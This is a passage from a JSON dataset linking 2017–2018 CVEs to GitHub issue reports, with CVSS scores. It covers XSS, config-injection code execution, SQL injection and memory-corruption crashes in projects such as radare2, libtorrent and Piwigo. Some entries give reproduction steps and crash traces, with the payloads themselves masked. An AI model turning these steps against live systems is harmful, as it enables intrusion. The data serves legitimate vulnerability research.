        "description": "Multiple Stored Cross Site Scriping NUMBERTAG poc:login >menu >administrator >common data >add array(or change) >key(or value) ERRORTAG >confirm FILETAG NUMBERTAG poc:login >menu >administrator >currencies >new(or edit) >decimal sign > ERRORTAG >save FILETAG NUMBERTAG poc:login >menu >administrator >countries >add array(or change) >key(or value) ERRORTAG >confirm FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-9668",
        "Issue_Url_old": "https://github.com/XiaoZhis/ProjectSend/issues/2",
        "Issue_Url_new": "https://github.com/xiaozhis/projectsend/issues/2",
        "Repo_new": "xiaozhis/projectsend",
        "Issue_Created_At": "2017-06-17T09:14:34Z",
        "description": "CMS Made Simple xss. User & group > group FILETAG FILETAG FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-9735",
        "Issue_Url_old": "https://github.com/eclipse/jetty.project/issues/1556",
        "Issue_Url_new": "https://github.com/eclipse/jetty.project/issues/1556",
        "Repo_new": "eclipse/jetty.project",
        "Issue_Created_At": "2017-05-16T07:33:48Z",
        "description": "A timing channel in APITAG Hi, I found a timing channel in APITAG URLTAG By using APITAG it actually violates the \"constant time implementation\" discipline. For more information about timing attack: URLTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-9741",
        "Issue_Url_old": "https://github.com/XiaoZhis/ProjectSend/issues/1",
        "Issue_Url_new": "https://github.com/xiaozhis/projectsend/issues/1",
        "Repo_new": "xiaozhis/projectsend",
        "Issue_Created_At": "2017-06-17T02:35:39Z",
        "description": "APITAG Code execution. The attacker can change the content of configuration file and constructing the dbprefix parameter to replace the TABLES_PREFIX of the configuration file with malicious code. So attacker can run malicious code remotely. code: if (isset($_POST FILETAG FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-9761",
        "Issue_Url_old": "https://github.com/radare/radare2/issues/7727",
        "Issue_Url_new": "https://github.com/radareorg/radare2/issues/7727",
        "Repo_new": "radareorg/radare2",
        "Issue_Created_At": "2017-06-12T13:22:40Z",
        "description": "Heap out of bounds read in APITAG Heap out of bounds read in APITAG Git HEAD NUMBERTAG cba1d Payload ( PATHTAG ) in URLTAG To reproduce: APITAG ASAN: ERRORTAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2017-9762",
        "Issue_Url_old": "https://github.com/radare/radare2/issues/7726",
        "Issue_Url_new": "https://github.com/radareorg/radare2/issues/7726",
        "Repo_new": "radareorg/radare2",
        "Issue_Created_At": "2017-06-12T12:45:13Z",
        "description": "Use after free in APITAG Use after free in APITAG Git HEAD: APITAG Payload ( PATHTAG ) in URLTAG To reproduce: APITAG ASAN: ERRORTAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2017-9763",
        "Issue_Url_old": "https://github.com/radare/radare2/issues/7723",
        "Issue_Url_new": "https://github.com/radareorg/radare2/issues/7723",
        "Repo_new": "radareorg/radare2",
        "Issue_Created_At": "2017-06-11T17:11:00Z",
        "description": "SIGSEGV APITAG large variable on stack) in APITAG SIGSEGV APITAG large variable on stack) in APITAG Git HEAD: APITAG Payload ( PATHTAG ) in URLTAG To reproduce: APITAG ASAN: ERRORTAG More context in Valgrind: ERRORTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-9771",
        "Issue_Url_old": "https://github.com/XiaoZhis/ProjectSend/issues/3",
        "Issue_Url_new": "https://github.com/xiaozhis/projectsend/issues/3",
        "Repo_new": "xiaozhis/projectsend",
        "Issue_Created_At": "2017-06-20T18:59:54Z",
        "description": "wb Code execution. The attacker can change the content of configuration file and constructing the database_username And many other parameters to replace the DB_USERNAME of the configuration file with malicious code. So attacker can run malicious command remotely. code: $debug = false; if (true === $debug) { ini_set('display_errors NUMBERTAG error_reporting(E_ALL); } // Start a session if (!defined('SESSION_STARTED')) { session_name('wb installer'); APITAG define('SESSION_STARTED', true); } // get random part for APITAG list($usec,$sec) = explode(' APITAG APITAG NUMBERTAG session_rand = rand NUMBERTAG Function to set error function set_error($message, $field_name = '') { // global $_POST; if (isset($message) AND $message != '') { // Copy values entered into session so user doesn't have to re enter everything if (isset($_POST FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-9780",
        "Issue_Url_old": "https://github.com/flatpak/flatpak/issues/845",
        "Issue_Url_new": "https://github.com/flatpak/flatpak/issues/845",
        "Repo_new": "flatpak/flatpak",
        "Issue_Created_At": "2017-06-12T16:22:42Z",
        "description": "handling suid/world writable content. Breaking URLTAG out into an issue, since I think we need to do more design. A basic problem here is we have NUMBERTAG separate cases to handle: Flatpak default of APITAG (currently APITAG ) Endless OS case of APITAG (i.e. bare ) APITAG case In the original PR I was thinking of the APITAG case. For that, we have two sub options: Land fixups for APITAG to suppress all this Convert to APITAG Either way, I think we're going to need some sort of \"repository format change\" mechanism. Doing a local pull between APITAG and APITAG unfortunately will require duplicating all of the content right APITAG possibly we could teach ostree that it's fine to hardlink file content between them, and just delete all the APITAG xattrs after? System case Something like APITAG to APITAG ? We'd error out on finding world writable/setuid files. Also, we add a APITAG flag to APITAG which does the same thing as URLTAG but for the bare case?",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2017-9782",
        "Issue_Url_old": "https://github.com/mdadams/jasper/issues/140",
        "Issue_Url_new": "https://github.com/jasper-software/jasper/issues/140",
        "Repo_new": "jasper-software/jasper",
        "Issue_Created_At": "2017-06-14T04:00:33Z",
        "description": "heap based buffer overflow in jp2_decode (jp2_dec.c). A heap overflow is found in jasper, and the tested commit is APITAG ERRORTAG Testcase: URLTAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2017-9807",
        "Issue_Url_old": "https://github.com/E2OpenPlugins/e2openplugin-OpenWebif/issues/620",
        "Issue_Url_new": "https://github.com/e2openplugins/e2openplugin-openwebif/issues/620",
        "Repo_new": "e2openplugins/e2openplugin-openwebif",
        "Issue_Created_At": "2017-06-21T14:37:43Z",
        "description": "Remote Code Execution on APITAG In line: URLTAG the APITAG call blindly executes any user supplied data. For example a remote unauthenticated attacker can use the following GET request to create a root owned file under APITAG on a APITAG NUMBERTAG HD se\" device: CODETAG We will be requesting a CVE for this issue and will report the CVE number once this becomes available, for issue coordination purposes.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-9836",
        "Issue_Url_old": "https://github.com/Piwigo/Piwigo/issues/716",
        "Issue_Url_new": "https://github.com/piwigo/piwigo/issues/716",
        "Repo_new": "piwigo/piwigo",
        "Issue_Created_At": "2017-06-23T16:18:05Z",
        "description": "Bug Report: Stored cross site scripting(XSS) in virtual_name parameter of FILETAG . Steps to reproduce NUMBERTAG Login to site as administrator NUMBERTAG create a new album FILETAG FILETAG NUMBERTAG enter the payload \"> APITAG payload has been base NUMBERTAG encode APITAG FILETAG FILETAG NUMBERTAG now you can see this script execute everywhere FILETAG Evironment: Windows XP Professional Apache APITAG PHP NUMBERTAG discovered by: topsec(lizhiqiang)",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.8,
        "impactScore": 2.7,
        "exploitabilityScore": 1.7
    },
    {
        "CVE_ID": "CVE-2017-9841",
        "Issue_Url_old": "https://github.com/sebastianbergmann/phpunit/issues/1955",
        "Issue_Url_new": "https://github.com/sebastianbergmann/phpunit/issues/1955",
        "Repo_new": "sebastianbergmann/phpunit",
        "Issue_Created_At": "2015-11-17T17:46:31Z",
        "description": "MENTIONTAG fails when running tests with phpdbg qrr. Running tests in a separate process does not work when run with the APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-9846",
        "Issue_Url_old": "https://github.com/zhonghaozhao/winmail/issues/1",
        "Issue_Url_new": "https://github.com/zhonghaozhao/winmail/issues/1",
        "Repo_new": "zhonghaozhao/winmail",
        "Issue_Created_At": "2017-06-23T13:25:52Z",
        "description": "winmail. FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-9847",
        "Issue_Url_old": "https://github.com/arvidn/libtorrent/issues/2099",
        "Issue_Url_new": "https://github.com/arvidn/libtorrent/issues/2099",
        "Repo_new": "arvidn/libtorrent",
        "Issue_Created_At": "2017-06-23T10:13:48Z",
        "description": "heap based buffer overflow in function APITAG Please provide the following information libtorrent version (or branch): the latest version NUMBERTAG platform/architecture: linu NUMBERTAG compiler and compiler version: clang NUMBERTAG please describe what symptom you see, what you would expect to see instead and how to reproduce it. Summary: There is a heap based buffer overflow in the libtorrent library. POC download: FILETAG Description: The debugging information is as follows: $ APITAG POC1 APITAG NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG eff2 at pc NUMBERTAG fc NUMBERTAG e3c NUMBERTAG a bp NUMBERTAG ffc3f6ac NUMBERTAG sp NUMBERTAG ffc3f6ac NUMBERTAG READ of size NUMBERTAG at NUMBERTAG eff2 thread T NUMBERTAG fc NUMBERTAG e3c NUMBERTAG PATHTAG NUMBERTAG fc NUMBERTAG c NUMBERTAG f6 ( PATHTAG NUMBERTAG df1b6 ( PATHTAG NUMBERTAG dea5f ( PATHTAG NUMBERTAG fc NUMBERTAG ed3da3f ( PATHTAG NUMBERTAG PATHTAG NUMBERTAG eff2 is located NUMBERTAG bytes to the right of NUMBERTAG byte region APITAG allocated by thread T0 here NUMBERTAG dd7e2 ( PATHTAG NUMBERTAG fc NUMBERTAG fe NUMBERTAG PATHTAG ) Shadow bytes around the buggy address NUMBERTAG c NUMBERTAG fff9da0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9db0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9dc0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9dd0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9de0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9df0: fa fa fa fa fa fa fa fa fa fa NUMBERTAG fa fa fa NUMBERTAG fa NUMBERTAG c NUMBERTAG fff9e NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9e NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9e NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9e NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9e NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe Left alloca redzone: ca Right alloca redzone: cb NUMBERTAG ABORTING This vulnerability was triggered in function APITAG at line APITAG NUMBERTAG char const parse_int(char const start, char const end, char delimiter NUMBERTAG boost::int NUMBERTAG t& val, APITAG ec NUMBERTAG while (start < end && start != delimiter NUMBERTAG if (!numeric( start NUMBERTAG int bdecode(char const start, char const end, bdecode_node& ret NUMBERTAG error_code& ec, int error_pos, int depth_limit, int token_limit NUMBERTAG default NUMBERTAG start NUMBERTAG APITAG e = bdecode_errors::no_error NUMBERTAG start = parse_int(start, end, ':', len, e); ... Credits: This vulnerability is detected by team OWL NUMBERTAG with our custom fuzzer APITAG Please contact EMAILTAG and EMAILTAG du.cn if you need more info about the team, the tool or the vulnerability.",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2017-9848",
        "Issue_Url_old": "https://github.com/Akityo/TOPSEC/issues/1",
        "Issue_Url_new": "https://github.com/akityo/topsec/issues/1",
        "Repo_new": "Akityo/TOPSEC",
        "Issue_Created_At": "2017-06-27T14:58:53Z",
        "description": "SQL injection vulnerability in APITAG in APITAG in Easysite NUMBERTAG soap\u6ce8\u5165 easysite webservice \u6587\u4ef6\uff1a FILETAG FILETAG APITAG parameter FILETAG FILETAG run in sqlmap POST PATHTAG HTTP NUMBERTAG Host: APITAG Content Type: text/xml; charset=utf NUMBERTAG Content Length: length APITAG \" URLTAG \" APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-9868",
        "Issue_Url_old": "https://github.com/eclipse/mosquitto/issues/468",
        "Issue_Url_new": "https://github.com/eclipse/mosquitto/issues/468",
        "Repo_new": "eclipse/mosquitto",
        "Issue_Created_At": "2017-06-21T22:00:27Z",
        "description": "mosquitto.db can be read by all [SECURITY]. mosquitto.db file is world readable. This is, obviously, leading to the possibility of every local user to read the topic database and values at any given time. (permission rw r r ). A security vulnerability such as this may prove disastorous to sensitive or secret data that can be contained within it. Mitigation will be scoping the permission scheme to a specific user, that is running the mosquitto service. Tested on an up to date raspberry pi NUMBERTAG with the latest release of mosquitto.",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2017-9928",
        "Issue_Url_old": "https://github.com/ckolivas/lrzip/issues/74",
        "Issue_Url_new": "https://github.com/ckolivas/lrzip/issues/74",
        "Repo_new": "ckolivas/lrzip",
        "Issue_Created_At": "2017-05-13T12:04:28Z",
        "description": "stack buffer overflow in get_fileinfo APITAG on lrzip version NUMBERTAG ERRORTAG testcase: URLTAG Credit: APITAG of Venustech",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2017-9929",
        "Issue_Url_old": "https://github.com/ckolivas/lrzip/issues/75",
        "Issue_Url_new": "https://github.com/ckolivas/lrzip/issues/75",
        "Repo_new": "ckolivas/lrzip",
        "Issue_Created_At": "2017-05-13T12:06:14Z",
        "description": "stack buffer overflow in get_fileinfo APITAG on lrzip version NUMBERTAG ERRORTAG testcase: URLTAG Credit: APITAG of Venustech",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2017-9949",
        "Issue_Url_old": "https://github.com/radare/radare2/issues/7683",
        "Issue_Url_new": "https://github.com/radareorg/radare2/issues/7683",
        "Repo_new": "radareorg/radare2",
        "Issue_Created_At": "2017-06-05T09:21:52Z",
        "description": "Stack buffer underflow in APITAG Stack buffer underflow in APITAG Git HEAD: APITAG Payload in URLTAG To reproduce: APITAG ASAN: ERRORTAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2017-9988",
        "Issue_Url_old": "https://github.com/libming/libming/issues/85",
        "Issue_Url_new": "https://github.com/libming/libming/issues/85",
        "Repo_new": "libming/libming",
        "Issue_Created_At": "2017-06-23T14:15:10Z",
        "description": "There is crash in listswf tool of libming . A crafted input can lead to a APITAG damage.. POC is got from FILETAG Description: The debugging information is as follows: $ ./listswf POC1 there is overflow in function APITAG that lead to malloc a large size of memory failure. It makes the program crash in APITAG the details is below. APITAG nsset APITAG = APITAG NUMBERTAG APITAG nsset >NS = malloc(sizeof(U NUMBERTAG nsset APITAG malloc failure, return NULL APITAG nsset >NS[i] = APITAG //cause NULL pointer DEF $gdb ./listswf (gdb) set args POC1 (gdb) r ... (gdb) bt NUMBERTAG APITAG (f=<optimized out>, nsset=<optimized out>, f=<optimized out>) at APITAG NUMBERTAG APITAG (cpool NUMBERTAG f NUMBERTAG at APITAG NUMBERTAG d NUMBERTAG in APITAG APITAG f NUMBERTAG at APITAG NUMBERTAG b4 in APITAG (f NUMBERTAG length NUMBERTAG at APITAG NUMBERTAG in APITAG (f NUMBERTAG length NUMBERTAG header=<optimized out>) at APITAG NUMBERTAG f NUMBERTAG in APITAG (f NUMBERTAG at APITAG NUMBERTAG main (argc=<optimized out>, argv=<optimized out>) at APITAG Credits: This vulnerability is detected by team OWL NUMBERTAG with our custom fuzzer APITAG Please contact EMAILTAG and EMAILTAG du.cn if you need more info about the team, the tool or the vulnerability.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-9989",
        "Issue_Url_old": "https://github.com/libming/libming/issues/86",
        "Issue_Url_new": "https://github.com/libming/libming/issues/86",
        "Repo_new": "libming/libming",
        "Issue_Created_At": "2017-06-23T14:17:45Z",
        "description": "There is crash in listswf tool of libming by a crafted input that will lead to a APITAG damage.. The POC is got from FILETAG Description: The debugging information is as follows: There is previous incorrect operation cause si >size too large that make malloc memory failure. It leads the program crash in APITAG , the details is below. APITAG buffer = malloc(si APITAG APITAG is too large buffer is NULL,malloc failure APITAG memset(buffer NUMBERTAG si APITAG NULL pointer deference $gdb ./listswf (gdb) set args POC2 (gdb) r ... (gdb) bt (gdb) bt NUMBERTAG memset_sse2 () at PATHTAG NUMBERTAG e0f3 in APITAG (si=<optimized out>) at APITAG NUMBERTAG APITAG (abc=<optimized out>, APITAG out>) at APITAG NUMBERTAG ec NUMBERTAG in APITAG (abc NUMBERTAG mi NUMBERTAG ffff NUMBERTAG f8) at APITAG NUMBERTAG ff NUMBERTAG in APITAG (abc NUMBERTAG at APITAG NUMBERTAG b0ca in APITAG (type=<optimized out>, blockp NUMBERTAG stream=<optimized out>) at APITAG NUMBERTAG c6 in APITAG (f=<optimized out>) at APITAG NUMBERTAG main (argc=<optimized out>, argv=<optimized out>) at APITAG Credits: This vulnerability is detected by team OWL NUMBERTAG with our custom fuzzer APITAG Please contact EMAILTAG and EMAILTAG du.cn if you need more info about the team, the tool or the vulnerability.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-0608",
        "Issue_Url_old": "https://github.com/h2o/h2o/issues/1775",
        "Issue_Url_new": "https://github.com/h2o/h2o/issues/1775",
        "Repo_new": "h2o/h2o",
        "Issue_Created_At": "2018-05-31T13:46:42Z",
        "description": "TBD.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-0787",
        "Issue_Url_old": "https://github.com/aspnet/Announcements/issues/295",
        "Issue_Url_new": "https://github.com/aspnet/announcements/issues/295",
        "Repo_new": "aspnet/announcements",
        "Issue_Created_At": "2018-03-13T17:07:23Z",
        "description": "Microsoft Security Advisory CVETAG : ASP.NET Core Elevation Of Privilege Vulnerability. Microsoft Security Advisory CVETAG : ASP.NET Core Elevation Of Privilege Vulnerability Executive summary Microsoft is releasing this security advisory to provide information about a vulnerability in ASP.NET Core versions NUMBERTAG and NUMBERTAG This advisory also provides guidance on what developers can do to update their applications to remove this vulnerability. Microsoft is aware of a security vulnerability in all public versions of ASP.NET Core where an elevation of privilege vulnerability exists when a ASP.NET Core web application fails to validate web requests correctly. Discussion Discussion for this issue can be found at URLTAG Mitigation factors Sites are not vulnerable to this elevation of privilege when: The site is hosted behind a proxy, such as Internet Information Services (IIS), NGINX, or Apache, where: The proxy validates the host header, and The proxy is configured to listen on fully qualified domain names or The proxy is configured with a wildcard subdomain where the root domain is fully controlled by the site owner. For example, if IIS is configured to respond to requests for APITAG or APITAG hosts, the application is protected. If IIS is configured to respond to any request from any host, the application is vulnerable. Kestrel does not have the capability to validate host headers and is vulnerable if not placed behind a proxy that performs the host header validation. Apps hosted in Azure Web Apps are not susceptible to this vulnerability. APITAG APITAG Affected software Any ASP.NET Core hosted application which is directly exposed to the internet, or hosted behind a proxy which does not validate or restict host headers to known good values. The vulnerability also affects any ASP.NET Core NUMBERTAG project if it uses the following package versions, which must also be updated app update , in addition to addressing your proxy configuration : Package name | Vulnerable versions | Secure versions | | APITAG NUMBERTAG and later APITAG NUMBERTAG and later No patches are available for ASP.NET Core NUMBERTAG or ASP.NET Core NUMBERTAG Microsoft requires that you place your NUMBERTAG ASP.NET Core application behind a proxy. You must address the configuration of your proxy to protect your application. If you're not running ASP.NET Core NUMBERTAG behind a proxy, you must either place a proxy in front of your application or upgrade to ASP.NET Core NUMBERTAG and add the host validating middleware provided at FILETAG Advisory FAQ How do I know if I am affected? Review the server and proxy configuration instructions configuration below to see if your system is configured correctly, and adjust the configuration if necessary. How do I fix the issue? You must address the configuration configuration of your server or proxy to protect your application to limit requests to known hosts. If you're not running Kestrel NUMBERTAG behind a proxy, you must either place a proxy in front of your application or upgrade to ASP.NET Core NUMBERTAG and follow the NUMBERTAG instructions below. ASP.NET Core NUMBERTAG applications must update your code app update to fully protect your application. APITAG APITAG Server and Proxy configuration You must examine your externally facing server or proxy configuration and ensure it requires host headers with fully qualified domain names, or known sub domains if you are using sub domain wild cards. ASP.NET Core applications behind IIS URLTAG To configure IIS to only respond to know hosts: Open IIS Manager. Expand the Sites node for the machine you want to configure. Select the site by clicking on the site. In the Actions list on the right hand side of IIS Manager, click Bindings . Edit any bindings that do not have a host name to specify one. Do not use a APITAG wildcard unless it's against a domain under your control. For example, APITAG is safe, APITAG is not. ASP.NET Core applications running publicly on Kestrel URLTAG Kestrel does not have the capability to validate host headers. It must either be placed behind a proxy that performs the host header validation or the validation must be performed within the application by adding host filtering middleware provided at URLTAG You must also update your dependencies app update to fully protect your application. ASP.NET Core applications running on FILETAG To configure URL prefixes and ports, you can use the APITAG extension method, the urls command line argument, the ASPNETCORE_URLS environment variable, or the APITAG property on APITAG URLTAG . The following code example uses APITAG . CODETAG ASP.NET Core applications behind NGINX URLTAG To configure NGINX as a reverse proxy to forward requests to your ASP.NET Core app, replace the contents PATHTAG with the following: CODETAG Note that with NGINX, when there is no match for APITAG , NGINX will pick the default server. If no default server has been defined, the first server in the conf file is the default server. Best practice is to add a specific default server which returns a status code of NUMBERTAG in the conf file. An example default server configuration would be as follows: APITAG With the preceding configuration file and default server, NGINX accepts public traffic on port NUMBERTAG with host header APITAG or APITAG . Requests not matching these hosts won't get forwarded to Kestrel. NGINX forwards the matching requests to Kestrel at APITAG . See FILETAG for more information. Once the NGINX configuration is established, run APITAG to verify the syntax of the configuration files. If the configuration file test is successful, force NGINX to pick up the changes by running APITAG . ASP.NET Core applications behind Apache URLTAG Configuration files for Apache are located within the APITAG directory. Any file with the APITAG extension: Is processed in alphabetical order, and The module configuration files in APITAG are processed. The module configuration files in APITAG contain any configuration files necessary to load modules. CODETAG The APITAG block can appear multiple times, in one or more files on a server. In the preceding configuration file, Apache accepts public traffic on port NUMBERTAG The domain APITAG is being served, and the APITAG alias resolves to the same website. See FILETAG for more information. Requests are proxied at the root to port NUMBERTAG of the server at APITAG For bi directional communication, APITAG and APITAG are required. Save the file and test the configuration. If everything passes, the response is APITAG . bash sudo service httpd configtest Restart Apache: bash sudo systemctl restart httpd sudo systemctl enable httpd APITAG APITAG ASP.NET Core NUMBERTAG application code updates If you're targeting .NET Core NUMBERTAG and the APITAG \"metapackage\": Update its version number to NUMBERTAG or later. Updating will pull in the fixed packages listed above. If you're targeting .NET Framework, update the packages listed above to their safe version or later. If your application is using Kestrel without a proxy or the APITAG functionality APITAG with APITAG you must also add the host filtering middleware provided at URLTAG .NET Core and ASP.NET Core have two types of dependencies: direct and transitive. You must follow the update instructions below to address both types of dependency. Direct dependencies Direct dependencies are dependencies where you specifically add a package to your project. For example, if you add the APITAG package to your project then you have taken a direct dependency on APITAG . Direct dependencies are discoverable by examining your csproj file. Transitive dependencies Transitive dependencies occur when you add a package to your project that in turn relies on another package. For example, if you add the APITAG package to your project it depends on the APITAG package (among others). Your project has a direct dependency on APITAG and a transitive dependency on the APITAG package. Transitive dependencies are reviewable: In the Visual Studio Solution Explorer window, which supports searching. By examining the FILETAG file contained in the obj directory of your project. The FILETAG files are the authoritative list of all packages used by your project, containing both direct and transitive dependencies. Fixing direct dependencies \u2013 Projects targeting .NET Core Open APITAG in your editor. If you're using Visual Studio, right click the project and choose Edit APITAG from the content menu, where projectname is the name of your project. Look for APITAG elements. The following shows an example project file: CODETAG The preceding example has a reference to the vulnerable metapackage, as seen by the single APITAG element. The name of the package is in the Include attribute. The package version number is in the Version attribute. The example shows a single direct dependency on APITAG version NUMBERTAG To update the version to the secure package, change the version number to a secure package version. In this example, update APITAG to NUMBERTAG or later. Save the csproj file. The example csproj now looks as follows: CODETAG If you're using Visual Studio and save your updated csproj file, Visual Studio will restore the new package version. You can see the restore results by opening the Output window APITAG and changing the Show output from drop down list to Package Manager . If you're not using Visual Studio, open a command line and change to your project directory. Execute the dotnet restore command to restore the updated dependencies. Fixing direct dependencies \u2013 Projects targeting .NET Framework Open APITAG in your editor. If you're using Visual Studio, right click the project and choose Edit APITAG from the content menu, where projectname is the name of your project. Look for APITAG nodes. The following shows an example project file: CODETAG The example has a reference to a single package, as seen by the APITAG element. The name of the package is in the Include attribute. The package version number is in the Version attribute. The example shows a direct dependency on one of the vulnerable packages from the table above, APITAG version NUMBERTAG To update to the secure package, change the version number to the updated package version. In the example, this would be updating APITAG to NUMBERTAG and later. Save the csproj file. The updated and secure csproj look as follows: CODETAG If you're using Visual Studio and save your updated csproj file, Visual Studio will restore the new package version. You can see the restore results by opening the Output window APITAG and changing the Show output from drop down list to Package Manager . If you're not using Visual Studio, open a command line and change to your project directory. Execute the dotnet restore command to restore the new dependency version. After updating your direct dependencies Recompile your application. If after recompilation you see a Dependency conflict warning , you must update your other direct dependencies to a compatible version. For example if your project refers directly to APITAG with a version number of APITAG , when you update your APITAG package to NUMBERTAG compilation will throw: APITAG To fix this, edit the version for the expected package to be the version expected by updating your FILETAG in the same way 